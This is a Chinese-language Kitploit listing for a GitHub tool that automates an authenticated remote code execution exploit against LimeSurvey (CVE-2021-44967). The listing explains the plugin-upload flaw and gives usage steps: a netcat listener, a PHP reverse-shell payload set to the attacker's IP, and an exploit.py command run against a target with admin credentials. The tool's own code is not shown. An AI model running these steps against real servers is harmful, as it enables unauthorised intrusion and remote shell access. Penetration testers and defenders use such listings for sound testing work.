Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
-Limesurvey-RCE-CVE-2021-44967 — 🔥 Limesurvey 自动化 RCE 利用工具 (CVE-2021-44967)。优化的权限提升利用链。🚀 | Kitploit
工具/GitHubGitHub/kikechans/-limesurvey-rce-cve-2021-44967
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试Payload 开发
GitHubkikechans/-limesurvey-rce-cve-2021-44967

-Limesurvey-RCE-CVE-2021-44967

🔥 Limesurvey 自动化 RCE 利用工具 (CVE-2021-44967)。优化的权限提升利用链。🚀

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
13个月前尚未审核
分享

🚀 LimeSurvey RCE(CVE-2021-44967)- 经过身份验证的远程代码执行

本仓库包含针对 CVE-2021-44967 的功能性漏洞利用程序,该漏洞是 LimeSurvey 中一个经过身份验证的远程代码执行漏洞。

🎯 兼容性

已在以下版本上测试并确认可用:

  • LimeSurvey 5.2.x
  • LimeSurvey 6.x

🐛 漏洞概述

该漏洞允许拥有管理员权限的已认证用户上传恶意插件。由于 LimeSurvey 未严格验证插件 ZIP 文件的内容,也未阻止插件目录中 PHP 文件的执行,攻击者可通过直接访问上传的 shell 实现 RCE。

✨ 功能特性

  • 🤖 自动化利用: 自动登录、处理 CSRF 令牌、上传、安装并激活插件。
  • ✅ 改进的兼容性: 更新了 config.xml,使其兼容 LimeSurvey 3.0 至 6.0 版本。
  • 💣 灵活的有效载荷: 包含一个健壮的 PHP 反弹 shell。

🛠️ 使用方法

1️⃣ 准备监听器

在您的机器上启动 netcat 监听器:

root@kitploit:~
nc -lvnp 443

2️⃣ 配置反弹 shell

编辑 php-rev.php,设置您的本地 IP 和端口:

root@kitploit:~
$ip = '<YOUR_IP>';
$port = 443;

3️⃣ 运行漏洞利用程序

root@kitploit:~
python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD>

示例:

root@kitploit:~
python3 exploit.py http://10.129.1.243/survey admin test

📁 仓库结构

  • 🐍 exploit.py:主自动化脚本。
  • 🐘 php-rev.php:PHP 反弹 shell 有效载荷。
  • ⚙️ config.xml:必需的 LimeSurvey 插件配置文件。

⚠️ 免责声明

本工具仅用于教育目的和授权安全测试。 严格用于受控、合法的环境(例如 CTF、实验室环境或授权渗透测试)。作者不对因使用本工具造成的任何滥用或损害负责。请负责任地使用,并仅对您拥有明确测试权限的系统进行操作。

下载工具